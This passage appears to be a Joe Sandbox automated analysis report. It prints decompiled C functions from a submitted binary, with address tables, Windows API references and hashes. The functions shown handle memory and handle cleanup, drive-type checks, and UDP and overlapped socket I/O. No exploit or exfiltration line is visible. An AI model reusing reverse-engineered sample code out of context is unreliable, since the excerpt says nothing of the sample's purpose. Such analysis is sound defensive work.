                                                                                                                                                                                                                                                                  0x004072d7
                                                                                                                                                                                                                                                                  0x004072da
                                                                                                                                                                                                                                                                  0x004072e6
                                                                                                                                                                                                                                                                  0x004072eb
                                                                                                                                                                                                                                                                  0x004072ee
                                                                                                                                                                                                                                                                  0x004072fc

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _allshl
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 435966717-0
                                                                                                                                                                                                                                                                  • Opcode ID: d51c0cfb7cecbe22f3a005448584aa28a11641046ad401d5bf26070a09b22ed4
                                                                                                                                                                                                                                                                  • Instruction ID: 9f754f3137e0fb20398a7b2bfdd3e3c1f04f25ec4d5826fc008780c671618def
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d51c0cfb7cecbe22f3a005448584aa28a11641046ad401d5bf26070a09b22ed4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3F03172A01428AB9710EEEF84424CAF7F69FC8364B128576FC18E3264E971ED1146F2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040DA20(intOrPtr* __ebx, void* __edi) {
                                                                                                                                                                                                                                                                  				void* _t8;
                                                                                                                                                                                                                                                                  				intOrPtr* _t18;
                                                                                                                                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                                                                                                                                  				intOrPtr _t26;
                                                                                                                                                                                                                                                                  				void* _t28;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t18 = __ebx;
                                                                                                                                                                                                                                                                  				if(__ebx != 0 &&  *__ebx == 0x756470) {
                                                                                                                                                                                                                                                                  					SetEvent( *(__ebx + 0x10));
                                                                                                                                                                                                                                                                  					WaitForSingleObject( *(__ebx + 0x14), 0xffffffff);
                                                                                                                                                                                                                                                                  					CloseHandle( *(__ebx + 0x14));
                                                                                                                                                                                                                                                                  					_t26 =  *((intOrPtr*)(__ebx + 0x20));
                                                                                                                                                                                                                                                                  					if(_t26 == 0) {
                                                                                                                                                                                                                                                                  						L6:
                                                                                                                                                                                                                                                                  						E00409320( *((intOrPtr*)(_t18 + 8)));
                                                                                                                                                                                                                                                                  						return E00408990(_t18);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					do {
                                                                                                                                                                                                                                                                  						E00408990( *((intOrPtr*)(_t26 + 0x18)));
                                                                                                                                                                                                                                                                  						_t23 =  *((intOrPtr*)(_t26 + 0x1c));
                                                                                                                                                                                                                                                                  						E00408990(_t26);
                                                                                                                                                                                                                                                                  						_t28 = _t28 + 8;
                                                                                                                                                                                                                                                                  						_t26 = _t23;
                                                                                                                                                                                                                                                                  					} while (_t23 != 0);
                                                                                                                                                                                                                                                                  					goto L6;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t8;
                                                                                                                                                                                                                                                                  			}








                                                                                                                                                                                                                                                                  0x0040da20
                                                                                                                                                                                                                                                                  0x0040da22
                                                                                                                                                                                                                                                                  0x0040da31
                                                                                                                                                                                                                                                                  0x0040da3d
                                                                                                                                                                                                                                                                  0x0040da47
                                                                                                                                                                                                                                                                  0x0040da4d
                                                                                                                                                                                                                                                                  0x0040da52
                                                                                                                                                                                                                                                                  0x0040da71
                                                                                                                                                                                                                                                                  0x0040da75
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040da83
                                                                                                                                                                                                                                                                  0x0040da55
                                                                                                                                                                                                                                                                  0x0040da59
                                                                                                                                                                                                                                                                  0x0040da5e
                                                                                                                                                                                                                                                                  0x0040da62
                                                                                                                                                                                                                                                                  0x0040da67
                                                                                                                                                                                                                                                                  0x0040da6a
                                                                                                                                                                                                                                                                  0x0040da6c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040da70
                                                                                                                                                                                                                                                                  0x0040da84

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA31
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA3D
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,0040DB15,?,?,0040BC3E,00000000), ref: 0040DA47
                                                                                                                                                                                                                                                                    • Part of subcall function 00408990: HeapFree.KERNEL32(00000000,00000000,00401192,?,00401192,?), ref: 004089EB
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                                                                                                                                                  • String ID: pdu
                                                                                                                                                                                                                                                                  • API String ID: 309973729-2320407122
                                                                                                                                                                                                                                                                  • Opcode ID: a4159a7b1ea9fa661d84915d37acaaaa2ad2be22c10f7c298b8a075976db8b92
                                                                                                                                                                                                                                                                  • Instruction ID: 681866068359fbce6a25617bf8070456bf8c17b75bf7d52c20a0952ba5eed7f9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4159a7b1ea9fa661d84915d37acaaaa2ad2be22c10f7c298b8a075976db8b92
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B8F0C8B69002109BCB24AFA5EC84C1B77B89F48320304467EFD547B386CA38EC09CBA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00404900(WCHAR* _a4) {
                                                                                                                                                                                                                                                                  				int _v8;
                                                                                                                                                                                                                                                                  				short _v1052;
                                                                                                                                                                                                                                                                  				intOrPtr _v1056;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v8 = GetDriveTypeW(_a4);
                                                                                                                                                                                                                                                                  				_v1056 = _v8;
                                                                                                                                                                                                                                                                  				if(_v1056 >= 2) {
                                                                                                                                                                                                                                                                  					if(_v1056 <= 3 || _v1056 == 6) {
                                                                                                                                                                                                                                                                  						if(QueryDosDeviceW(_a4,  &_v1052, 0x208) != 0 && StrCmpNW( &_v1052, L"\\??\\", 4) == 0) {
                                                                                                                                                                                                                                                                  							_v8 = 1;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v8;
                                                                                                                                                                                                                                                                  			}






                                                                                                                                                                                                                                                                  0x00404913
                                                                                                                                                                                                                                                                  0x00404919
                                                                                                                                                                                                                                                                  0x00404926
                                                                                                                                                                                                                                                                  0x0040492f
                                                                                                                                                                                                                                                                  0x00404954
                                                                                                                                                                                                                                                                  0x0040496e
                                                                                                                                                                                                                                                                  0x0040496e
                                                                                                                                                                                                                                                                  0x00404954
                                                                                                                                                                                                                                                                  0x0040492f
                                                                                                                                                                                                                                                                  0x0040497b

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDriveTypeW.KERNEL32(004049BF), ref: 0040490D
                                                                                                                                                                                                                                                                  • QueryDosDeviceW.KERNEL32(004049BF,?,00000208), ref: 0040494C
                                                                                                                                                                                                                                                                  • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00404964
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: DeviceDriveQueryType
                                                                                                                                                                                                                                                                  • String ID: \??\
                                                                                                                                                                                                                                                                  • API String ID: 1681518211-3047946824
                                                                                                                                                                                                                                                                  • Opcode ID: 942f71382a869f2c97a40c4b9f3276f149eb08a5c33dbbf2d140b6582a894b9a
                                                                                                                                                                                                                                                                  • Instruction ID: 0e74c5151ddb8513688fdff2756bd8c47834fad0a87df30cb323bbc8f0aad129
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 942f71382a869f2c97a40c4b9f3276f149eb08a5c33dbbf2d140b6582a894b9a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4001E1F094120CEBCB60CF65CD49ADA77B4AB45705F0081BAA604B7690D7749E85CF99
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                                                                                                                  			E0040D7F0(char* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                  				short _v18;
                                                                                                                                                                                                                                                                  				short _v22;
                                                                                                                                                                                                                                                                  				short _v26;
                                                                                                                                                                                                                                                                  				short _v28;
                                                                                                                                                                                                                                                                  				short _v30;
                                                                                                                                                                                                                                                                  				char _v32;
                                                                                                                                                                                                                                                                  				char _v36;
                                                                                                                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                                                                                                                  				intOrPtr _v44;
                                                                                                                                                                                                                                                                  				char _v56;
                                                                                                                                                                                                                                                                  				intOrPtr _v68;
                                                                                                                                                                                                                                                                  				char* _t23;
                                                                                                                                                                                                                                                                  				short _t26;
                                                                                                                                                                                                                                                                  				long _t29;
                                                                                                                                                                                                                                                                  				short _t34;
                                                                                                                                                                                                                                                                  				intOrPtr _t37;
                                                                                                                                                                                                                                                                  				intOrPtr _t43;
                                                                                                                                                                                                                                                                  				long _t47;
                                                                                                                                                                                                                                                                  				signed int _t48;
                                                                                                                                                                                                                                                                  				void* _t50;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t40 = __edx;
                                                                                                                                                                                                                                                                  				_t50 = (_t48 & 0xfffffff8) - 0x1c;
                                                                                                                                                                                                                                                                  				_t34 = 0;
                                                                                                                                                                                                                                                                  				_t43 = _a4;
                                                                                                                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					_t23 =  &_v32;
                                                                                                                                                                                                                                                                  					_v32 = 0;
                                                                                                                                                                                                                                                                  					__imp__#10( *(_t43 + 8), 0x4004667f, _t23);
                                                                                                                                                                                                                                                                  					if(_t23 == 0xffffffff) {
                                                                                                                                                                                                                                                                  						break;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t37 = _v44;
                                                                                                                                                                                                                                                                  					if(_t37 != 0) {
                                                                                                                                                                                                                                                                  						if(_t34 == 0 || _v40 < _t37) {
                                                                                                                                                                                                                                                                  							_v40 = _t37;
                                                                                                                                                                                                                                                                  							_t26 = E00408880(_t37, _t40, _t34, _t37);
                                                                                                                                                                                                                                                                  							_t37 = _v44;
                                                                                                                                                                                                                                                                  							_t50 = _t50 + 8;
                                                                                                                                                                                                                                                                  							_t34 = _t26;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						_v30 = 0;
                                                                                                                                                                                                                                                                  						_v26 = 0;
                                                                                                                                                                                                                                                                  						_v22 = 0;
                                                                                                                                                                                                                                                                  						_v18 = 0;
                                                                                                                                                                                                                                                                  						_t29 =  *(_t43 + 8);
                                                                                                                                                                                                                                                                  						_v32 = 0;
                                                                                                                                                                                                                                                                  						_t40 =  &_v32;
                                                                                                                                                                                                                                                                  						_v36 = 0x10;
                                                                                                                                                                                                                                                                  						__imp__#17(_t29, _t34, _t37, 0,  &_v32,  &_v36);
                                                                                                                                                                                                                                                                  						_t47 = _t29;
                                                                                                                                                                                                                                                                  						if(_t47 != 0xffffffff && _t47 != 0) {
                                                                                                                                                                                                                                                                  							InterlockedExchangeAdd(_t43 + 0x18, _t47);
                                                                                                                                                                                                                                                                  							_t40 =  &_v56;
                                                                                                                                                                                                                                                                  							E0040D6C0(_t43, _t34, _t47, _v68,  &_v56);
                                                                                                                                                                                                                                                                  							_t50 = _t50 + 0x14;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				} while (WaitForSingleObject( *(_t43 + 0x10), 1) == 0x102);
                                                                                                                                                                                                                                                                  				return E00408990(_t34);
                                                                                                                                                                                                                                                                  			}























                                                                                                                                                                                                                                                                  0x0040d7f0
                                                                                                                                                                                                                                                                  0x0040d7f6
                                                                                                                                                                                                                                                                  0x0040d7fb
                                                                                                                                                                                                                                                                  0x0040d7fe
                                                                                                                                                                                                                                                                  0x0040d801
                                                                                                                                                                                                                                                                  0x0040d805
                                                                                                                                                                                                                                                                  0x0040d808
                                                                                                                                                                                                                                                                  0x0040d813
                                                                                                                                                                                                                                                                  0x0040d81b
                                                                                                                                                                                                                                                                  0x0040d824
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d82a
                                                                                                                                                                                                                                                                  0x0040d830
                                                                                                                                                                                                                                                                  0x0040d838
                                                                                                                                                                                                                                                                  0x0040d842
                                                                                                                                                                                                                                                                  0x0040d846
                                                                                                                                                                                                                                                                  0x0040d84b
                                                                                                                                                                                                                                                                  0x0040d84f
                                                                                                                                                                                                                                                                  0x0040d852
                                                                                                                                                                                                                                                                  0x0040d852
                                                                                                                                                                                                                                                                  0x0040d858
                                                                                                                                                                                                                                                                  0x0040d85c
                                                                                                                                                                                                                                                                  0x0040d860
                                                                                                                                                                                                                                                                  0x0040d864
                                                                                                                                                                                                                                                                  0x0040d86e
                                                                                                                                                                                                                                                                  0x0040d871
                                                                                                                                                                                                                                                                  0x0040d876
                                                                                                                                                                                                                                                                  0x0040d880
                                                                                                                                                                                                                                                                  0x0040d888
                                                                                                                                                                                                                                                                  0x0040d88e
                                                                                                                                                                                                                                                                  0x0040d893
                                                                                                                                                                                                                                                                  0x0040d89e
                                                                                                                                                                                                                                                                  0x0040d8a8
                                                                                                                                                                                                                                                                  0x0040d8b1
                                                                                                                                                                                                                                                                  0x0040d8b6
                                                                                                                                                                                                                                                                  0x0040d8b6
                                                                                                                                                                                                                                                                  0x0040d893
                                                                                                                                                                                                                                                                  0x0040d8c5
                                                                                                                                                                                                                                                                  0x0040d8df

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ioctlsocket.WS2_32 ref: 0040D81B
                                                                                                                                                                                                                                                                  • recvfrom.WS2_32 ref: 0040D888
                                                                                                                                                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D89E
                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040D8BF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3980219359-0
                                                                                                                                                                                                                                                                  • Opcode ID: 05a2bb9e7a3121bc56c56a086e10ed4f77bf971dac491e08655f5bc05b27729b
                                                                                                                                                                                                                                                                  • Instruction ID: 119aadf5a9a9cd361830cf8028f649034fe7dd0606bb4db59d8f1df16a6ab9b6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05a2bb9e7a3121bc56c56a086e10ed4f77bf971dac491e08655f5bc05b27729b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 672187B2504301AFD314EF65DC8496BB7E9EF84314F008A3DF565E2291E774D94C8BAA
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 29%
                                                                                                                                                                                                                                                                  			E0040E750(char _a4) {
                                                                                                                                                                                                                                                                  				long _v4;
                                                                                                                                                                                                                                                                  				struct _OVERLAPPED* _v8;
                                                                                                                                                                                                                                                                  				long _v12;
                                                                                                                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                                                                                                                  				signed int _t31;
                                                                                                                                                                                                                                                                  				signed int _t32;
                                                                                                                                                                                                                                                                  				signed int _t36;
                                                                                                                                                                                                                                                                  				struct _OVERLAPPED* _t38;
                                                                                                                                                                                                                                                                  				long _t43;
                                                                                                                                                                                                                                                                  				char _t51;
                                                                                                                                                                                                                                                                  				struct _OVERLAPPED* _t52;
                                                                                                                                                                                                                                                                  				long* _t54;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t54 =  &_v12;
                                                                                                                                                                                                                                                                  				_t51 = _a4;
                                                                                                                                                                                                                                                                  				_t52 = 0;
                                                                                                                                                                                                                                                                  				_v4 = 0;
                                                                                                                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_t31 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                                                                                                                                                                                                  				_t43 = _v12;
                                                                                                                                                                                                                                                                  				_t32 = _t31 & 0xffffff00 | _t31 != 0x00000000;
                                                                                                                                                                                                                                                                  				if(_t43 == 0) {
                                                                                                                                                                                                                                                                  					return _t32;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					if(_t32 == 0) {
                                                                                                                                                                                                                                                                  						_t38 =  *((intOrPtr*)(_t43 + 0x260));
                                                                                                                                                                                                                                                                  						__imp__WSAGetOverlappedResult(_t38, _v8,  &_v4, 0,  &_a4);
                                                                                                                                                                                                                                                                  						if(_t38 == 0) {
                                                                                                                                                                                                                                                                  							__imp__#111();
                                                                                                                                                                                                                                                                  							_t52 = _t38;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_push(_t52);
                                                                                                                                                                                                                                                                  					E0040E560(_v8, _v4, _v12);
                                                                                                                                                                                                                                                                  					_t54 =  &(_t54[1]);
                                                                                                                                                                                                                                                                  					_t52 = 0;
                                                                                                                                                                                                                                                                  					_v4 = 0;
                                                                                                                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                                                                                                                  					_v8 = 0;
                                                                                                                                                                                                                                                                  					_t36 = GetQueuedCompletionStatus( *(_t51 + 8),  &_v4,  &_v12,  &_v8, 0xffffffff);
                                                                                                                                                                                                                                                                  					_t43 = _v12;
                                                                                                                                                                                                                                                                  					_t32 = _t36 & 0xffffff00 | _t36 != 0x00000000;
                                                                                                                                                                                                                                                                  				} while (_t43 != 0);
                                                                                                                                                                                                                                                                  				return _t32;
                                                                                                                                                                                                                                                                  			}















                                                                                                                                                                                                                                                                  0x0040e750
                                                                                                                                                                                                                                                                  0x0040e75c
                                                                                                                                                                                                                                                                  0x0040e773
                                                                                                                                                                                                                                                                  0x0040e777
                                                                                                                                                                                                                                                                  0x0040e77b
                                                                                                                                                                                                                                                                  0x0040e77f
                                                                                                                                                                                                                                                                  0x0040e783
                                                                                                                                                                                                                                                                  0x0040e785
                                                                                                                                                                                                                                                                  0x0040e78b
                                                                                                                                                                                                                                                                  0x0040e790
                                                                                                                                                                                                                                                                  0x0040e80f
                                                                                                                                                                                                                                                                  0x0040e80f
                                                                                                                                                                                                                                                                  0x0040e793
                                                                                                                                                                                                                                                                  0x0040e795
                                                                                                                                                                                                                                                                  0x0040e7a7
                                                                                                                                                                                                                                                                  0x0040e7af
                                                                                                                                                                                                                                                                  0x0040e7b7
                                                                                                                                                                                                                                                                  0x0040e7b9
                                                                                                                                                                                                                                                                  0x0040e7bf
                                                                                                                                                                                                                                                                  0x0040e7bf
                                                                                                                                                                                                                                                                  0x0040e7b7
                                                                                                                                                                                                                                                                  0x0040e7cd
                                                                                                                                                                                                                                                                  0x0040e7ce
                                                                                                                                                                                                                                                                  0x0040e7d3
                                                                                                                                                                                                                                                                  0x0040e7e9
                                                                                                                                                                                                                                                                  0x0040e7ed
                                                                                                                                                                                                                                                                  0x0040e7f1
                                                                                                                                                                                                                                                                  0x0040e7f5
                                                                                                                                                                                                                                                                  0x0040e7f9
                                                                                                                                                                                                                                                                  0x0040e7fb
                                                                                                                                                                                                                                                                  0x0040e801
                                                                                                                                                                                                                                                                  0x0040e804
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040E783
                                                                                                                                                                                                                                                                  • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 0040E7AF
                                                                                                                                                                                                                                                                  • WSAGetLastError.WS2_32 ref: 0040E7B9
                                                                                                                                                                                                                                                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 0040E7F9
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2074799992-0
                                                                                                                                                                                                                                                                  • Opcode ID: 932397d408765186933d4a6ef8f6ec9becc02e2dac47d78dfefd6a6c2ad256da
                                                                                                                                                                                                                                                                  • Instruction ID: 9fa0d190d6e29d18b90f4a83acc4cb02c1da8db6fe46cf76fa1674e9ca939a6c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 932397d408765186933d4a6ef8f6ec9becc02e2dac47d78dfefd6a6c2ad256da
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5215E711083119BC200DF56D880D5BB7ECBFC8B54F144A2EF598A3291D734EA09CBAA
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E30C
                                                                                                                                                                                                                                                                  • WSAGetLastError.WS2_32 ref: 0040E312
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000001), ref: 0040E328
                                                                                                                                                                                                                                                                  • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 0040E34A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Send$ErrorLastSleep
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2121970615-0
                                                                                                                                                                                                                                                                  • Opcode ID: 366a37056b0dc1f51f69018f0e1f9e1bfaea74e70fcce9b28d20fa95ce7c14e7
                                                                                                                                                                                                                                                                  • Instruction ID: 81c4ec745dd4513a9ad0e7e8fad5c67f00d8ce5ff8787c200ce92e4071391af0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 366a37056b0dc1f51f69018f0e1f9e1bfaea74e70fcce9b28d20fa95ce7c14e7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B014472244305AAE730DA96DC85F9B77A8DBC4711F044839F604D62C0C7B6A5459B79
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040BAF0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                  				intOrPtr* _v8;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  				void* _t20;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                                                                                                                                                  					_v8 = _a4;
                                                                                                                                                                                                                                                                  					EnterCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                                                                                                                  					while(_v12 <  *_v8) {
                                                                                                                                                                                                                                                                  						_t11 = _v8 + 0x1c; // 0xfe5ae850
                                                                                                                                                                                                                                                                  						CloseHandle( *( *_t11 + _v12 * 4));
                                                                                                                                                                                                                                                                  						_v12 = _v12 + 1;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					LeaveCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                  					DeleteCriticalSection(_v8 + 4);
                                                                                                                                                                                                                                                                  					_t18 = _v8 + 0x1c; // 0xfe5ae850
                                                                                                                                                                                                                                                                  					E00408990( *_t18);
                                                                                                                                                                                                                                                                  					return E00408990(_a4);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t20;
                                                                                                                                                                                                                                                                  			}






                                                                                                                                                                                                                                                                  0x0040bafa
                                                                                                                                                                                                                                                                  0x0040baff
                                                                                                                                                                                                                                                                  0x0040bb09
                                                                                                                                                                                                                                                                  0x0040bb0f
                                                                                                                                                                                                                                                                  0x0040bb21
                                                                                                                                                                                                                                                                  0x0040bb2e
